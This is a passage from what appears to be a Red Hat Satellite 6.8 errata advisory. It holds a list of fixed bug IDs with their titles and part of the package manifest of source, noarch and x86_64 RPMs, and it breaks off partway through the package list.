`requests.exceptions.HTTPError: 502 Server Error: Proxy Error for url`\n1875660 - Reporting Template macros host_cores is not working as expected\n1875667 - Audit page list incorrect search filter\n1877307 - [Authentication] External auth login using Kerberos SSO is failing for AD and IDM on Satellite 6.8 only\n1877354 - [Sat6/Bug] RHEL8 systems generate false positive warnings about repo binding\n1877443 - Post Satellite 6.8 Upgrade AD authentication via LDAP fails when using an A record which returns 42 entries\n1877452 - content set mappings for satellite-tools-6.8-for-rhel-8 AUS repos are missing from cdn/cs_mappings-*.csv\n1877520 - content set mappings for satellite-tools-6.8-for-rhel-8 EUS repos are missing from cdn/cs_mappings-*.csv\n1877542 - content set mappings for rhel7 satellite-tools-6.8 EUS repos are missing from cdn/cs_mappings-*.csv\n1878194 - In Capsule upgrade, \"yum update\" dump some error messages. \n1878556 - PXE provisioning in satellite 6.8 requires httpboot enabled\n1878693 - Unable to perform image based deployment using hosts module from Red Hat Satellite Ansible Collections\n1878850 - creating host from hg doesn\u0027t resolves the user-data template\n1879151 - Remote execution status not updating with large number of hosts\n1879448 - Add hits details to host details page\n1879451 - Stop uploading if Satellite\u0027s setting is disconnected\n1879453 - Add plugin version to report metadata\n1879571 - unable to kexec discovered hosts - satellite tries to reach wrong IP\n1880637 - [6.8] satellite-installer always runs upgrade steps\n1881066 - Safemode doesn\u0027t allow to access \u0027host_cores\u0027 on #\u003cSafemode::ScopeObject\u003e\n1881078 - Use Passenger instead of Puma as the Foreman application server\n1881988 - [RFE] IPv6 support for Satellite 6.8\n1882276 - Satellite installation fails at execution of \u0027/usr/sbin/foreman-rake -- config -k \u0027remote_execution_cockpit_url\u0027 -v \u0027/webcon/=%{host}\u0027\u0027\n1882389 - Search query in template for LEAPP upgrade should be pre-filled when running from pre-upgrade results\n1883093 - installer-upgrade failed with error \"Could not evaluate: Proxy XYZ.com cannot be retrieved: unknown error (response 500)\"\n1883472 - [Sat6.8/Bug] when registering more than ~240 in parallel getting this error \"HTTP error (500 - Internal Server Error): Unable to register system, not all services available\"\n1887483 - Access insights pages refer to non-existing stylesheets, resulting in completely broken visuals\n1887489 - Insights rules can\u0027t be loaded on freshly installed Satellite system\n1887808 - Satellite-installer fails because of outdated RHSCL repository on DVD ISO\n\n6. Package List:\n\nRed Hat Satellite Capsule 6.8:\n\nSource:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm\nansible-runner-1.4.6-1.el7ar.src.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.src.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm\ncreaterepo_c-0.7.4-1.el7sat.src.rpm\nforeman-2.1.2.19-1.el7sat.src.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.src.rpm\nforeman-discovery-image-3.6.7-1.el7sat.src.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.src.rpm\nforeman-installer-2.1.2.8-1.el7sat.src.rpm\nforeman-proxy-2.1.2-2.el7sat.src.rpm\nfuture-0.16.0-11.el7sat.src.rpm\ngofer-2.12.5-7.el7sat.src.rpm\nhfsplus-tools-332.14-12.el7.src.rpm\nkatello-3.16.0-1.el7sat.src.rpm\nkatello-certs-tools-2.7.1-1.el7sat.src.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.src.rpm\nkatello-selinux-3.4.0-1.el7sat.src.rpm\nkobo-0.5.1-1.el7sat.src.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.src.rpm\nlibsolv-0.7.4-4.pulp.el7sat.src.rpm\nlibwebsockets-2.4.2-2.el7.src.rpm\nlivecd-tools-20.4-1.6.el7sat.src.rpm\nmod_xsendfile-0.12-11.el7sat.src.rpm\nostree-2017.1-2.atomic.el7.src.rpm\npulp-2.21.3-1.el7sat.src.rpm\npulp-docker-3.2.7-1.el7sat.src.rpm\npulp-katello-1.0.3-1.el7sat.src.rpm\npulp-ostree-1.3.1-2.el7sat.src.rpm\npulp-puppet-2.21.3-2.el7sat.src.rpm\npulp-rpm-2.21.3-2.el7sat.src.rpm\npuppet-agent-6.14.0-2.el7sat.src.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.src.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.src.rpm\npuppetserver-6.13.0-1.el7sat.src.rpm\npycairo-1.16.3-9.el7sat.src.rpm\npygobject3-3.28.3-2.el7sat.src.rpm\npython-amqp-2.2.2-5.el7sat.src.rpm\npython-anyjson-0.3.3-11.el7sat.src.rpm\npython-apypie-0.2.2-1.el7sat.src.rpm\npython-billiard-3.5.0.3-3.el7sat.src.rpm\npython-blinker-1.3-2.el7sat.src.rpm\npython-celery-4.0.2-9.el7sat.src.rpm\npython-click-6.7-9.el7sat.src.rpm\npython-crane-3.3.1-9.el7sat.src.rpm\npython-daemon-2.1.2-7.el7at.src.rpm\npython-django-1.11.29-1.el7sat.src.rpm\npython-flask-0.12.2-4.el7sat.src.rpm\npython-gnupg-0.3.7-1.el7ui.src.rpm\npython-isodate-0.5.4-12.el7sat.src.rpm\npython-itsdangerous-0.24-15.el7sat.src.rpm\npython-jinja2-2.10-10.el7sat.src.rpm\npython-jmespath-0.9.0-6.el7_7.src.rpm\npython-kid-0.9.6-11.el7sat.src.rpm\npython-kombu-4.0.2-13.el7sat.src.rpm\npython-lockfile-0.11.0-10.el7ar.src.rpm\npython-markupsafe-0.23-21.el7sat.src.rpm\npython-mongoengine-0.10.5-2.el7sat.src.rpm\npython-nectar-1.6.2-1.el7sat.src.rpm\npython-oauth2-1.5.211-8.el7sat.src.rpm\npython-okaara-1.0.37-2.el7sat.src.rpm\npython-pexpect-4.6-1.el7at.src.rpm\npython-psutil-5.0.1-3.el7sat.src.rpm\npython-ptyprocess-0.5.2-3.el7at.src.rpm\npython-pycurl-7.43.0.2-4.el7sat.src.rpm\npython-pymongo-3.2-2.el7sat.src.rpm\npython-qpid-1.35.0-5.el7.src.rpm\npython-semantic_version-2.2.0-6.el7sat.src.rpm\npython-simplejson-3.2.0-1.el7sat.src.rpm\npython-twisted-16.4.1-12.el7sat.src.rpm\npython-vine-1.1.3-6.el7sat.src.rpm\npython-werkzeug-0.12.2-5.el7sat.src.rpm\npython-zope-interface-4.0.5-4.el7.src.rpm\nqpid-cpp-1.36.0-28.el7amq.src.rpm\nqpid-dispatch-1.5.0-4.el7.src.rpm\nqpid-proton-0.28.0-3.el7.src.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm\nrepoview-0.6.6-11.el7sat.src.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.src.rpm\nrubygem-highline-1.7.8-3.el7sat.src.rpm\nrubygem-newt-0.9.6-3.el7sat.src.rpm\nrubygem-oauth-0.5.4-2.el7sat.src.rpm\nsaslwrapper-0.22-5.el7sat.src.rpm\nsatellite-6.8.0-1.el7sat.src.rpm\nsatellite-installer-6.8.0.11-1.el7sat.src.rpm\ntfm-6.1-1.el7sat.src.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.src.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.src.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.src.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.src.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm\n\nnoarch:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm\nansible-runner-1.4.6-1.el7ar.noarch.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm\ncrane-selinux-3.4.0-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm\nforeman-debug-2.1.2.19-1.el7sat.noarch.rpm\nforeman-discovery-image-3.6.7-1.el7sat.noarch.rpm\nforeman-installer-2.1.2.8-1.el7sat.noarch.rpm\nforeman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm\nforeman-proxy-2.1.2-2.el7sat.noarch.rpm\nforeman-proxy-content-3.16.0-1.el7sat.noarch.rpm\nforeman-proxy-journald-2.1.2-2.el7sat.noarch.rpm\nkatello-certs-tools-2.7.1-1.el7sat.noarch.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm\nkatello-common-3.16.0-1.el7sat.noarch.rpm\nkatello-debug-3.16.0-1.el7sat.noarch.rpm\nkobo-0.5.1-1.el7sat.noarch.rpm\npulp-admin-client-2.21.3-1.el7sat.noarch.rpm\npulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm\npulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm\npulp-katello-1.0.3-1.el7sat.noarch.rpm\npulp-maintenance-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-child-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-common-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-parent-2.21.3-1.el7sat.noarch.rpm\npulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm\npulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm\npulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-selinux-2.21.3-1.el7sat.noarch.rpm\npulp-server-2.21.3-1.el7sat.noarch.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm\npuppetserver-6.13.0-1.el7sat.noarch.rpm\npython-blinker-1.3-2.el7sat.noarch.rpm\npython-gnupg-0.3.7-1.el7ui.noarch.rpm\npython-gofer-2.12.5-7.el7sat.noarch.rpm\npython-gofer-qpid-2.12.5-7.el7sat.noarch.rpm\npython-kid-0.9.6-11.el7sat.noarch.rpm\npython-mongoengine-0.10.5-2.el7sat.noarch.rpm\npython-nectar-1.6.2-1.el7sat.noarch.rpm\npython-oauth2-1.5.211-8.el7sat.noarch.rpm\npython-pulp-agent-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-bindings-2.21.3-1.el7sat.noarch.rpm\npython-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-common-2.21.3-1.el7sat.noarch.rpm\npython-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm\npython-pulp-integrity-2.21.3-2.el7sat.noarch.rpm\npython-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm\npython-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm\npython-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm\npython-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-streamer-2.21.3-1.el7sat.noarch.rpm\npython-qpid-1.35.0-5.el7.noarch.rpm\npython-semantic_version-2.2.0-6.el7sat.noarch.rpm\npython2-amqp-2.2.2-5.el7sat.noarch.rpm\npython2-ansible-runner-1.4.6-1.el7ar.noarch.rpm\npython2-anyjson-0.3.3-11.el7sat.noarch.rpm\npython2-apypie-0.2.2-1.el7sat.noarch.rpm\npython2-celery-4.0.2-9.el7sat.noarch.rpm\npython2-click-6.7-9.el7sat.noarch.rpm\npython2-crane-3.3.1-9.el7sat.noarch.rpm\npython2-daemon-2.1.2-7.el7at.noarch.rpm\npython2-django-1.11.29-1.el7sat.noarch.rpm\npython2-flask-0.12.2-4.el7sat.noarch.rpm\npython2-future-0.16.0-11.el7sat.noarch.rpm\npython2-isodate-0.5.4-12.el7sat.noarch.rpm\npython2-itsdangerous-0.24-15.el7sat.noarch.rpm\npython2-jinja2-2.10-10.el7sat.noarch.rpm\npython2-jmespath-0.9.0-6.el7_7.noarch.rpm\npython2-kombu-4.0.2-13.el7sat.noarch.rpm\npython2-lockfile-0.11.0-10.el7ar.noarch.rpm\npython2-okaara-1.0.37-2.el7sat.noarch.rpm\npython2-pexpect-4.6-1.el7at.noarch.rpm\npython2-ptyprocess-0.5.2-3.el7at.noarch.rpm\npython2-vine-1.1.3-6.el7sat.noarch.rpm\npython2-werkzeug-0.12.2-5.el7sat.noarch.rpm\nqpid-dispatch-tools-1.5.0-4.el7.noarch.rpm\nqpid-tools-1.36.0-28.el7amq.noarch.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm\nrepoview-0.6.6-11.el7sat.noarch.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm\nrubygem-highline-1.7.8-3.el7sat.noarch.rpm\nrubygem-oauth-0.5.4-2.el7sat.noarch.rpm\nsatellite-capsule-6.8.0-1.el7sat.noarch.rpm\nsatellite-common-6.8.0-1.el7sat.noarch.rpm\nsatellite-debug-tools-6.8.0-1.el7sat.noarch.rpm\nsatellite-installer-6.8.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm\n\nx86_64:\ncreaterepo_c-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-libs-0.7.4-1.el7sat.x86_64.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm\nforeman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm\nhfsplus-tools-332.14-12.el7.x86_64.rpm\nhfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibsolv-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibwebsockets-2.4.2-2.el7.x86_64.rpm\nlibwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm\nlivecd-tools-20.4-1.6.el7sat.x86_64.rpm\nmod_xsendfile-0.12-11.el7sat.x86_64.rpm\nmod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm\nostree-2017.1-2.atomic.el7.x86_64.rpm\nostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm\npuppet-agent-6.14.0-2.el7sat.x86_64.rpm\npycairo-1.16.3-9.el7sat.x86_64.rpm\npycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm\npygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm\npython-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm\npython-bson-3.2-2.el7sat.x86_64.rpm\npython-imgcreate-20.4-1.6.el7sat.x86_64.rpm\npython-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm\npython-psutil-5.0.1-3.el7sat.x86_64.rpm\npython-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm\npython-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm\npython-pymongo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm\npython-qpid-proton-0.28.0-3.el7.x86_64.rpm\npython-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm\npython-saslwrapper-0.22-5.el7sat.x86_64.rpm\npython-simplejson-3.2.0-1.el7sat.x86_64.rpm\npython-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm\npython-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm\npython-zope-interface-4.0.5-4.el7.x86_64.rpm\npython-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm\npython2-billiard-3.5.0.3-3.el7sat.x86_64.rpm\npython2-gobject-3.28.3-2.el7sat.x86_64.rpm\npython2-gobject-base-3.28.3-2.el7sat.x86_64.rpm\npython2-markupsafe-0.23-21.el7sat.x86_64.rpm\npython2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm\npython2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm\npython2-twisted-16.4.1-12.el7sat.x86_64.rpm\nqpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm\nqpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm\nqpid-dispatch-router-1.5.0-4.el7.x86_64.rpm\nqpid-proton-c-0.28.0-3.el7.x86_64.rpm\nqpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm\nqpid-qmf-1.36.0-28.el7amq.x86_64.rpm\nrubygem-newt-0.9.6-3.el7sat.x86_64.rpm\nrubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm\nsaslwrapper-0.22-5.el7sat.x86_64.rpm\nsaslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-runtime-6.1-1.el7sat.x86_64.rpm\n\nRed Hat Satellite 6.7:\n\nSource:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm\nansible-runner-1.4.6-1.el7ar.src.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.src.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm\ncandlepin-3.1.21-1.el7sat.src.rpm\ncreaterepo_c-0.7.4-1.el7sat.src.rpm\nforeman-2.1.2.19-1.el7sat.src.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.src.rpm\nforeman-discovery-image-3.6.7-1.el7sat.src.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.src.rpm\nforeman-installer-2.1.2.8-1.el7sat.src.rpm\nforeman-proxy-2.1.2-2.el7sat.src.rpm\nforeman-selinux-2.1.2.3-1.el7sat.src.rpm\nfuture-0.16.0-11.el7sat.src.rpm\ngofer-2.12.5-7.el7sat.src.rpm\nhfsplus-tools-332.14-12.el7.src.rpm\nkatello-3.16.0-1.el7sat.src.rpm\nkatello-certs-tools-2.7.1-1.el7sat.src.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.src.rpm\nkatello-selinux-3.4.0-1.el7sat.src.rpm\nkeycloak-httpd-client-install-1.2.2-1.el7sat.src.rpm\nkobo-0.5.1-1.el7sat.src.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.src.rpm\nlibsolv-0.7.4-4.pulp.el7sat.src.rpm\nlibwebsockets-2.4.2-2.el7.src.rpm\nlivecd-tools-20.4-1.6.el7sat.src.rpm\nmod_xsendfile-0.12-11.el7sat.src.rpm\nostree-2017.1-2.atomic.el7.src.rpm\npcp-mmvstatsd-0.4-2.el7sat.src.rpm\npulp-2.21.3-1.el7sat.src.rpm\npulp-docker-3.2.7-1.el7sat.src.rpm\npulp-katello-1.0.3-1.el7sat.src.rpm\npulp-ostree-1.3.1-2.el7sat.src.rpm\npulp-puppet-2.21.3-2.el7sat.src.rpm\npulp-rpm-2.21.3-2.el7sat.src.rpm\npuppet-agent-6.14.0-2.el7sat.src.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.src.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.src.rpm\npuppetserver-6.13.0-1.el7sat.src.rpm\npycairo-1.16.3-9.el7sat.src.rpm\